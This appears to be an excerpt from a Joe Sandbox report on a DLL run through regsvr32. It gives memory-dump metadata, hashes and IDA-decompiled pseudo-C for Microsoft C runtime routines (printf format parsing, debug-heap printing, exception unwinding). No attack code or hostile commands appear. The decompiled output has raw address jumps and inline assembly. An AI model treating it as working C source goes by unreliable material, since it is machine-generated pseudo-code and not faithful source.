                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                        • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2576288505-192189897
                                                                                        • Opcode ID: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                                                        • Instruction ID: 7af9cebcf9cdbe51cb5c05a1613d0acac690945035c75598d7829d850d960732
                                                                                        • Opcode Fuzzy Hash: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                                                        • Instruction Fuzzy Hash: 40515E72A0D6C68AE7F0DB24E8947BEBBE4E384355F600126D2CD869A9DB7DD540CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 26%
                                                                                        			E000007FE7FEF9D3DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                        				void* _t139;
                                                                                        				char* _t159;
                                                                                        				char* _t160;
                                                                                        
                                                                                        				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                                                        				_t159 =  &_a1560;
                                                                                        				_a88 = E000007FE7FEF9D31E40(_t159);
                                                                                        				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                                                        				_a80 = _a80 | 0x00000004;
                                                                                        				_a88 =  ~_a88;
                                                                                        				goto 0xf9d3dd83;
                                                                                        				_a88 = _t139 + _t159 - 0x30;
                                                                                        				_a116 = 0;
                                                                                        				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                                        				_t160 =  &_a1560;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t160);
                                                                                        				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3dddb;
                                                                                        				_a116 = _t139 + _t160 - 0x30;
                                                                                        				_a1408 = _a1208 & 0x0000ffff;
                                                                                        				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                                        				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                                        				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                                        				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                                        				goto 0xf9d3df88;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                                        				_a1544 =  &(_a1544[1]);
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3de61;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                                        				goto 0xf9d3df6d;
                                                                                        				_a1216 = 0;
                                                                                        				goto E000007FE7FEF9D3DC41;
                                                                                        				goto 0xf9d3df88;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a1412 = _a1208 & 0x0000ffff;
                                                                                        				_a1412 = _a1412 - 0x41;
                                                                                        				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                                        				goto __rax;
                                                                                        			}






                                                                                        0x7fef9d3dd3b
                                                                                        0x7fef9d3dd3d
                                                                                        0x7fef9d3dd4a
                                                                                        0x7fef9d3dd53
                                                                                        0x7fef9d3dd5c
                                                                                        0x7fef9d3dd66
                                                                                        0x7fef9d3dd6a
                                                                                        0x7fef9d3dd7f
                                                                                        0x7fef9d3dd88
                                                                                        0x7fef9d3dda0
                                                                                        0x7fef9d3dda2
                                                                                        0x7fef9d3ddaf
                                                                                        0x7fef9d3ddb8
                                                                                        0x7fef9d3ddba
                                                                                        0x7fef9d3ddc2
                                                                                        0x7fef9d3ddd7
                                                                                        0x7fef9d3dde8
                                                                                        0x7fef9d3ddf7
                                                                                        0x7fef9d3de01
                                                                                        0x7fef9d3de0f
                                                                                        0x7fef9d3de19
                                                                                        0x7fef9d3de1f
                                                                                        0x7fef9d3de32
                                                                                        0x7fef9d3de40
                                                                                        0x7fef9d3de4c
                                                                                        0x7fef9d3de54
                                                                                        0x7fef9d3de5d
                                                                                        0x7fef9d3de61
                                                                                        0x7fef9d3de6a
                                                                                        0x7fef9d3de80
                                                                                        0x7fef9d3de91
                                                                                        0x7fef9d3de9f
                                                                                        0x7fef9d3deab
                                                                                        0x7fef9d3deb3
                                                                                        0x7fef9d3dec6
                                                                                        0x7fef9d3ded7
                                                                                        0x7fef9d3dee5
                                                                                        0x7fef9d3def1
                                                                                        0x7fef9d3def9
                                                                                        0x7fef9d3df09
                                                                                        0x7fef9d3df19
                                                                                        0x7fef9d3df29
                                                                                        0x7fef9d3df39
                                                                                        0x7fef9d3df49
                                                                                        0x7fef9d3df59
                                                                                        0x7fef9d3df5b
                                                                                        0x7fef9d3df5d
                                                                                        0x7fef9d3df68
                                                                                        0x7fef9d3df6d
                                                                                        0x7fef9d3df76
                                                                                        0x7fef9d3df7a
                                                                                        0x7fef9d3df80
                                                                                        0x7fef9d3df95
                                                                                        0x7fef9d3dfa6
                                                                                        0x7fef9d3dfb5
                                                                                        0x7fef9d3dfdc

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                        • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2576288505-734865713
                                                                                        • Opcode ID: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                                                        • Instruction ID: f5bf503dfe25a3916c99f1d9d67644448d63221e22ccd8ab12d6653ca93a9968
                                                                                        • Opcode Fuzzy Hash: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                                                        • Instruction Fuzzy Hash: 0E510DB2A0C6C28AE7F09B64E8407BEB7E4F394345F600126E6C9879A9DB7DD445CF14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 24%
                                                                                        			E000007FE7FEF9D3BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                        				void* _t113;
                                                                                        				char* _t133;
                                                                                        
                                                                                        				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                                                        				_t133 =  &_a1112;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t133);
                                                                                        				if (_a116 >= 0) goto 0xf9d3be14;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3be2d;
                                                                                        				_a116 = _t113 + _t133 - 0x30;
                                                                                        				_a972 = _a696 & 0x000000ff;
                                                                                        				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                                        				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                                        				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                                        				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                                        				_a1096 = _a1096 + 1;
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3beb2;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				_a704 = 0;
                                                                                        				goto E000007FE7FEF9D3BB66;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a976 = _a696;
                                                                                        				_a976 = _a976 - 0x41;
                                                                                        				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                                        				goto __rax;
                                                                                        			}





                                                                                        0x7fef9d3bdf2
                                                                                        0x7fef9d3bdf4
                                                                                        0x7fef9d3be01
                                                                                        0x7fef9d3be0a
                                                                                        0x7fef9d3be0c
                                                                                        0x7fef9d3be14
                                                                                        0x7fef9d3be29
                                                                                        0x7fef9d3be3a
                                                                                        0x7fef9d3be49
                                                                                        0x7fef9d3be53
                                                                                        0x7fef9d3be61
                                                                                        0x7fef9d3be6b
                                                                                        0x7fef9d3be71
                                                                                        0x7fef9d3be84
                                                                                        0x7fef9d3be91
                                                                                        0x7fef9d3be9d
                                                                                        0x7fef9d3bea5
                                                                                        0x7fef9d3beae
                                                                                        0x7fef9d3beb2
                                                                                        0x7fef9d3bebb
                                                                                        0x7fef9d3bed1
                                                                                        0x7fef9d3bee2
                                                                                        0x7fef9d3bef0
                                                                                        0x7fef9d3befc
                                                                                        0x7fef9d3bf04
                                                                                        0x7fef9d3bf17
                                                                                        0x7fef9d3bf28
                                                                                        0x7fef9d3bf36
                                                                                        0x7fef9d3bf42
                                                                                        0x7fef9d3bf4a
                                                                                        0x7fef9d3bf5a
                                                                                        0x7fef9d3bf6a
                                                                                        0x7fef9d3bf7a
                                                                                        0x7fef9d3bf8a
                                                                                        0x7fef9d3bf9a
                                                                                        0x7fef9d3bfaa
                                                                                        0x7fef9d3bfac
                                                                                        0x7fef9d3bfae
                                                                                        0x7fef9d3bfb9
                                                                                        0x7fef9d3bfbe
                                                                                        0x7fef9d3bfc7
                                                                                        0x7fef9d3bfcb
                                                                                        0x7fef9d3bfd1
                                                                                        0x7fef9d3bfe6
                                                                                        0x7fef9d3bff7
                                                                                        0x7fef9d3c006
                                                                                        0x7fef9d3c02d

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                        • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2576288505-192189897
                                                                                        • Opcode ID: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                                                        • Instruction ID: 7a8513096c3cb2bd444751f94b1f2e61cedcdb1a9580f93edff9428065c01d53
                                                                                        • Opcode Fuzzy Hash: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                                                        • Instruction Fuzzy Hash: 0C415B72A0DAC28AE7F0DB24E8947BEB7E4E384745F600126D6DD869A9DB3DD541CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 24%
                                                                                        			E000007FE7FEF9D3DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                        				void* _t113;
                                                                                        				char* _t133;
                                                                                        
                                                                                        				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                                        				_t133 =  &_a1560;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t133);
                                                                                        				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3dddb;
                                                                                        				_a116 = _t113 + _t133 - 0x30;
                                                                                        				_a1408 = _a1208 & 0x0000ffff;
                                                                                        				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                                        				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                                        				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                                        				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                                        				goto 0xf9d3df88;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                                        				_a1544 =  &(_a1544[1]);
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3de61;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                                        				goto 0xf9d3df6d;
                                                                                        				_a1216 = 0;
                                                                                        				goto E000007FE7FEF9D3DC41;
                                                                                        				goto 0xf9d3df88;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a1412 = _a1208 & 0x0000ffff;
                                                                                        				_a1412 = _a1412 - 0x41;
                                                                                        				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                                        				goto __rax;
                                                                                        			}





                                                                                        0x7fef9d3dda0
                                                                                        0x7fef9d3dda2
                                                                                        0x7fef9d3ddaf
                                                                                        0x7fef9d3ddb8
                                                                                        0x7fef9d3ddba
                                                                                        0x7fef9d3ddc2
                                                                                        0x7fef9d3ddd7
                                                                                        0x7fef9d3dde8
                                                                                        0x7fef9d3ddf7
                                                                                        0x7fef9d3de01
                                                                                        0x7fef9d3de0f
                                                                                        0x7fef9d3de19
                                                                                        0x7fef9d3de1f
                                                                                        0x7fef9d3de32
                                                                                        0x7fef9d3de40
                                                                                        0x7fef9d3de4c
                                                                                        0x7fef9d3de54
                                                                                        0x7fef9d3de5d
                                                                                        0x7fef9d3de61
                                                                                        0x7fef9d3de6a
                                                                                        0x7fef9d3de80
                                                                                        0x7fef9d3de91
                                                                                        0x7fef9d3de9f
                                                                                        0x7fef9d3deab
                                                                                        0x7fef9d3deb3
                                                                                        0x7fef9d3dec6
                                                                                        0x7fef9d3ded7
                                                                                        0x7fef9d3dee5
                                                                                        0x7fef9d3def1
                                                                                        0x7fef9d3def9
                                                                                        0x7fef9d3df09
                                                                                        0x7fef9d3df19
                                                                                        0x7fef9d3df29
                                                                                        0x7fef9d3df39
                                                                                        0x7fef9d3df49
                                                                                        0x7fef9d3df59
                                                                                        0x7fef9d3df5b
                                                                                        0x7fef9d3df5d
                                                                                        0x7fef9d3df68
                                                                                        0x7fef9d3df6d
                                                                                        0x7fef9d3df76
                                                                                        0x7fef9d3df7a
                                                                                        0x7fef9d3df80
                                                                                        0x7fef9d3df95
                                                                                        0x7fef9d3dfa6
                                                                                        0x7fef9d3dfb5
                                                                                        0x7fef9d3dfdc

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                        • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2576288505-734865713
                                                                                        • Opcode ID: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                                                        • Instruction ID: 14f8518244b6aa56c92c2133ed4feb23c5223715f37474fc6187c6031a63ef29
                                                                                        • Opcode Fuzzy Hash: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                                                        • Instruction Fuzzy Hash: 94414DB2A0C6C28AE7F09B64E8407BEB2E4F384746F600125D6C9875E8DB3DD444CF14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invoke_watson_if_oneof_swprintf_p
                                                                                        • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                        • API String ID: 2731067127-3604075083
                                                                                        • Opcode ID: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                                                        • Instruction ID: d4871e39cfd66166000c08c845a9e51e3e7b3f71581565f00727d2aef18c331a
                                                                                        • Opcode Fuzzy Hash: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                                                        • Instruction Fuzzy Hash: C8415972A0D7C186E7A49B55E8903AEBBA0F784740FA14126E6CD47BA9DB3ED404CF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 41%
                                                                                        			E000007FE7FEF9D34F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
                                                                                        				void* _v16;
                                                                                        				long long _v24;
                                                                                        				long long _v32;
                                                                                        				long long _v40;
                                                                                        				long long _v48;
                                                                                        				void* _v56;
                                                                                        				signed int _v72;
                                                                                        				long long _v80;
                                                                                        				signed int _v88;
                                                                                        				void* _t88;
                                                                                        				void* _t89;
                                                                                        				void* _t90;
                                                                                        				void* _t92;
                                                                                        				void* _t93;
                                                                                        				void* _t101;
                                                                                        				long long _t113;
                                                                                        				intOrPtr _t116;
                                                                                        				void* _t117;
                                                                                        				long long _t118;
                                                                                        				long long _t121;
                                                                                        				long long _t122;
                                                                                        				long long _t125;
                                                                                        				void* _t164;
                                                                                        
                                                                                        				_t113 = __rax;
                                                                                        				_a32 = r9d;
                                                                                        				_a24 = __r8;
                                                                                        				_a16 = __rdx;
                                                                                        				_a8 = __rcx;
                                                                                        				_v88 = E000007FE7FEF9D33B70(_a8, _a16, _a24);
                                                                                        				E000007FE7FEF9D2E680(_t79, _t113);
                                                                                        				_v80 = _t113;
                                                                                        				0xf9d24000();
                                                                                        				_v56 = _t113 + 0x100;
                                                                                        				 *_v56 =  *_v56 + 1;
                                                                                        				if (_v88 == 0xffffffff) goto 0xf9d35103;
                                                                                        				if (_v88 - _a32 <= 0) goto 0xf9d35103;
                                                                                        				if (_v88 - 0xffffffff <= 0) goto 0xf9d34fb9;
                                                                                        				_t116 = _a24;
                                                                                        				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0xf9d34fb9;
                                                                                        				goto 0xf9d34fbe;
                                                                                        				E000007FE7FEF9D2E680(E000007FE7FEF9D2CF80(_t116), _t116);
                                                                                        				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
                                                                                        				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
                                                                                        				_t88 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
                                                                                        				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
                                                                                        				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0xf9d35038;
                                                                                        				_t89 = E000007FE7FEF9D2E680(_t88, _t118);
                                                                                        				_v48 = _t118;
                                                                                        				_t90 = E000007FE7FEF9D2E680(_t89, _t118);
                                                                                        				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                                                        				_v40 = _t121;
                                                                                        				goto 0xf9d35041;
                                                                                        				_v40 = 0;
                                                                                        				if (_v40 == 0) goto 0xf9d350f4;
                                                                                        				r9d = _v72;
                                                                                        				_t92 = E000007FE7FEF9D2E680(E000007FE7FEF9D33BD0(_t90, _a8, _a16, _a24), _t121);
                                                                                        				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
                                                                                        				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0xf9d350c9;
                                                                                        				_t93 = E000007FE7FEF9D2E680(_t92, _t122);
                                                                                        				_v32 = _t122;
                                                                                        				E000007FE7FEF9D2E680(_t93, _t122);
                                                                                        				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                                                        				_v24 = _t125;
                                                                                        				goto 0xf9d350d2;
                                                                                        				_v24 = 0;
                                                                                        				r8d = 0x103;
                                                                                        				E000007FE7FEF9D2E6C0(E000007FE7FEF9D3D7E0(_v24, _a8, _t164), _t125, _v80);
                                                                                        				goto 0xf9d350f6;
                                                                                        				_v88 = _v72;
                                                                                        				goto 0xf9d34f83;
                                                                                        				0xf9d24000();
                                                                                        				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0xf9d35131;
                                                                                        				0xf9d24000();
                                                                                        				_v16 = _t125 + 0x100;
                                                                                        				 *_v16 =  *_v16 - 1;
                                                                                        				if (_v88 == 0xffffffff) goto 0xf9d3514a;
                                                                                        				if (_v88 - _a32 <= 0) goto 0xf9d3514a;
                                                                                        				_t101 = E000007FE7FEF9D2CF80(_v16);
                                                                                        				r9d = _v88;
                                                                                        				return E000007FE7FEF9D33BD0(_t101, _a8, _a16, _a24);
                                                                                        			}


























                                                                                        0x7fef9d34f20
                                                                                        0x7fef9d34f20
                                                                                        0x7fef9d34f25
                                                                                        0x7fef9d34f2a
                                                                                        0x7fef9d34f2f
                                                                                        0x7fef9d34f55
                                                                                        0x7fef9d34f59
                                                                                        0x7fef9d34f5e
                                                                                        0x7fef9d34f63
                                                                                        0x7fef9d34f6e
                                                                                        0x7fef9d34f81
                                                                                        0x7fef9d34f88
                                                                                        0x7fef9d34f99
                                                                                        0x7fef9d34fa4
                                                                                        0x7fef9d34fa6
                                                                                        0x7fef9d34fb5
                                                                                        0x7fef9d34fb7
                                                                                        0x7fef9d34fbe
                                                                                        0x7fef9d34fcf
                                                                                        0x7fef9d34fda
                                                                                        0x7fef9d34fde
                                                                                        0x7fef9d34fef
                                                                                        0x7fef9d34ffc
                                                                                        0x7fef9d34ffe
                                                                                        0x7fef9d35003
                                                                                        0x7fef9d35008
                                                                                        0x7fef9d3502e
                                                                                        0x7fef9d35031
                                                                                        0x7fef9d35036
                                                                                        0x7fef9d35038
                                                                                        0x7fef9d35047
                                                                                        0x7fef9d3504d
                                                                                        0x7fef9d3506f
                                                                                        0x7fef9d35080
                                                                                        0x7fef9d3508d
                                                                                        0x7fef9d3508f
                                                                                        0x7fef9d35094
                                                                                        0x7fef9d35099
                                                                                        0x7fef9d350bf
                                                                                        0x7fef9d350c2
                                                                                        0x7fef9d350c7
                                                                                        0x7fef9d350c9
                                                                                        0x7fef9d350d2
                                                                                        0x7fef9d350ef
                                                                                        0x7fef9d350f4
                                                                                        0x7fef9d350fa
                                                                                        0x7fef9d350fe
                                                                                        0x7fef9d35103
                                                                                        0x7fef9d3510f
                                                                                        0x7fef9d35111
                                                                                        0x7fef9d3511c
                                                                                        0x7fef9d3512f
                                                                                        0x7fef9d35136
                                                                                        0x7fef9d35143
                                                                                        0x7fef9d35145
                                                                                        0x7fef9d3514a
                                                                                        0x7fef9d35170

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
